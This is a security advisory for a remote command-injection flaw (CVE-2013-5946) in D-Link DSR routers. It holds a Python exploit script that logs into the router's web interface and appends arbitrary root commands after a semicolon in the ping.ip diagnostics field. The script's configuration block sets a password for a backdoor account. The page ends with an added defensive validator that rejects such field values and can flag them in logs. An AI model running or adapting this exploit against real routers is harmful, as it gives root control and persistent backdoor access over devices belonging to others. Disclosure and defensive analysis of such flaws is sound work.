Link DSR Router Remote Arbitrary Command Execution Vulnerability (CVE

Published: 2013-12-03
Updated: 2013-12-13

Affected systems:
D-Link DSR Router DSR-500N
D-Link DSR Router DSR-250N
D-Link DSR Router DSR-150N
D-Link DSR Router DSR-150
D-Link DSR Router DSR-1000N
D-Link DSR Router DSR-1000
D-Link DSR Router D-Link DSR-500
Description:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 64181
CVE(CAN) ID: CVE-2013-5946

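D-Link DSR is a line of wireless services routers.

The D-Link DSR router series contains a remote arbitrary command execution vulnerability in its implementation. Successful exploitation allows an attacker to execute arbitrary commands with root privileges.

<*Source: nu11.nu11
  *>

Test method:
--------------------------------------------------------------------------------

WARNING

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!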

#!/usr/bin/python


import httplib
import urllib
import telnetlib
import time
import sys
import crypt
import random
import string


##############################
#
# CHANGE THESE VALUES -- BEGIN
#
# Your router's IP:PORT
ipaddr = "192.168.10.1:443"
# Password to be set (by this hack) on the backdoor account
bdpasswd = "password"
#
# CHANGE THESE VALUES -- END
#
# persistent config file:    /tmp/teamf1.cfg.ascii
#                            Edit this file to make your changes persistent.
#
##############################


cookie = ""
pid = -2
bduser = ""
   

def request(m = "", u = "", b = "", h = ""):
    global ipaddr
    conn = httplib.HTTPSConnection(ipaddr, timeout = 15)
    assert m in ["GET", "POST"]
    conn.request(method = m, url = u, body = b, headers = h)
    ret = conn.getresponse()
    header = ret.getheaders()
    data = ret.read()
    conn.close()
    return (header, data)


def login(user, passwd):
    global ipaddr
    headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               'User-Agent': "Exploit",
               'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi",
               'Content-Type': "application/x-www-form-urlencoded"}
    body = {'thispage'                          : "index.htm",
            'Users.UserName'                    : user,
            'Users.Password'                    : passwd,
            'button.login.Users.deviceStatus'   : "Login",
            'Login.userAgent'                   : "Exploit"}
    return request("POST", "/scgi-bin/platform.cgi",
                   urllib.urlencode(body), headers)
   
   
def logout():
    global ipaddr, cookie
    headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               'User-Agent': "Exploit",
               'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi",
               'Content-Type': "application/x-www-form-urlencoded"}
    body = ""
    return request("GET", "/scgi-bin/platform.cgi?page=index.htm",
                   urllib.urlencode(body), headers)


def execCmd(cmd = None):
    global ipaddr, cookie
    assert cmd != None
    headers = {'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               'User-Agent': "Exploit",
               'Referer': "https://" + ipaddr + "/scgi-bin/platform.cgi?page=systemCheck.htm",
               'Cookie': cookie,
               'Content-Type': "application/x-www-form-urlencoded"}
    # Injection point: the ';' ends the intended host value of the
    # diagnostics form field and cmd is appended after it.
    body = {'thispage'                          : "systemCheck.htm",
            'ping.ip'                           : "localhost;" + cmd,
            'button.traceroute.diagDisplay'     : "Traceroute"}
    return request("POST", "/scgi-bin/platform.cgi",
                   urllib.urlencode(body), headers)
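
The request built by execCmd() appends text after a ';' in the ping.ip form field of systemCheck.htm. As an added example (Python 3, not part of the original advisory and not D-Link's code), the check below shows the server-side validation and shell-free invocation that keep such a field away from a command interpreter. The function names, the sample bodies and the traceroute binary name are assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# One RFC 1123 hostname label: letters, digits, hyphens, no hyphen at either end.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")

# Constructed sample bodies (not captured traffic); CMD is a placeholder.
BENIGN = "thispage=systemCheck.htm&ping.ip=192.168.10.1&button.traceroute.diagDisplay=Traceroute"
SUSPECT = "thispage=systemCheck.htm&ping.ip=localhost%3BCMD&button.traceroute.diagDisplay=Traceroute"


def is_valid_target(value):
    """Accept only a literal IP address or a syntactically valid hostname."""
    # '%' introduces an IPv6 zone ID, which is free-form text: refuse it.
    if not value or len(value) > 253 or "%" in value:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    # fullmatch, not match with '$': '$' would let a trailing newline through.
    return all(_LABEL.fullmatch(p) for p in value.rstrip(".").split("."))


def check_diag_request(body):
    """Parse a urlencoded form body; return (allowed, submitted_target)."""
    targets = parse_qs(body, keep_blank_values=True).get("ping.ip", [])
    if len(targets) != 1:          # missing or duplicated field
        return (False, None)
    return (is_valid_target(targets[0]), targets[0])


def build_traceroute_argv(target):
    """Return an argv list for subprocess.run(argv) with no shell involved."""
    if not is_valid_target(target):
        raise ValueError("rejected diagnostic target: %r" % (target,))
    # Binary name is an assumption; the page does not say what the CGI runs.
    return ["traceroute", target]


if __name__ == "__main__":
    for sample in (BENIGN, SUSPECT):
        print(check_diag_request(sample))
```

The same validator can be run over logged POST bodies to /scgi-bin/platform.cgi to flag requests whose ping.ip value is not a plain host or address.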
